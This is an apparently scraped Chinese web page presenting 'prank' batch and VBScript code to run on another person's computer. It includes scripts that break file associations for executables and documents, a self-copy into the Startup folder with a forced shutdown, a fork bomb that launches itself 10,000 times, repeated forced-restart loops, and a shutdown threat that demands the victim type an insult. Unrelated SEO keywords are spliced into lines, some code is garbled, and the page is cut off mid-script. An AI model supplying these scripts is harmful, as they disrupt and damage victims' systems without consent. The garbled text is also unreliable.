python整⼈代码⼤全_整⼈代码⼤全这是⼀个恶搞程序,运⾏后会出现N个本地磁盘,但是对电脑没有什么实际伤害。
@echo off
python基础代码大全黑客for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:\)
如果要解除就⽤这个
unicode表中文@echo off
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)
如果你对对⽅恨之⼊⾻就⽤这个,这个会把⽂件关联改的⼀团糟
@echo off
assoc .exe=txtfile
assoc .txt=exefile
assoc .mp3=txtfile
assoc .flv=txtfile
assoc .swf=txtfile
assoc .fla=txtfile
assoc .jpg=txtfile
assoc .bmp=txtfile
assoc .zip=txtfile
assoc .7z=txtfile
assoc .rar=txtfile
assoc .tag=txtfile
assoc .jpge=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .avi=txtfile
assoc .wav=txtfile
assoc .htm=txtfile
assoc .html=txtfile
assoc .vbs=txtfile
assoc .vbe=txtfile
assoc .js=txtfile
assoc .rxproj=txtfile
assoc .mdb=txtfile
assoc .dll=txtfile
assoc .dat=txtfile
assoc .sys=txtfile
assoc .wmv=txtfile
assoc .ogg=txtfile
assoc .db=txtfile
assoc .mid=txtfile
assoc .gif=txtfile
assoc .png=txtfile
assoc .doc=txtfile
html常用的四个标签assoc .exl=txtfile
assoc .pdf=txtfile
assoc .chm=txtfile
assoc .nfo=txtfilecomposer下载安装
或者⽤这个
@echo off
copy %0 "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" shutdown -s -f -t 0
你也可以⽤这个超级弹窗程序吓吓他
javascript 教程网站@echo off
for /l %%i in (1,1,10000) do (start %0)
让对⽅重启指定次数
@echo off
if not exist echo. > & goto err1
if not exist echo. > & goto err1
if not exist echo. > & goto err1
if not exist echo. > & goto err1
if not exist echo. > & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上⾯可以让对⽅电脑重启5次后不在重启,当然如果你修改⼀下加个if not exist echo. > & goto err1那就是重启6次对⽅必须说“我是猪”,否则电脑会在60秒内关机。
on error resume next
dim WSHshellA
set WSHshellA = ateobject("wscript.shell")
WSHshellA.run " /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就⼀分钟关你机,不信,试试···"" ",0 ,true dim a do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就⾏了嘛"
dim WSHshell
set WSHshell = ateobject("wscript.shell")
WSHshell.run " /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,⼀切皆有可能~"
让⼈崩溃的关机程序
⾸先你可以看下⾯的
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)
WScript.Echo("你是可爱的XX童鞋吗?")mybatis 批量插数据
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关⼼我")
WScript.Echo("哼,我⽣

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。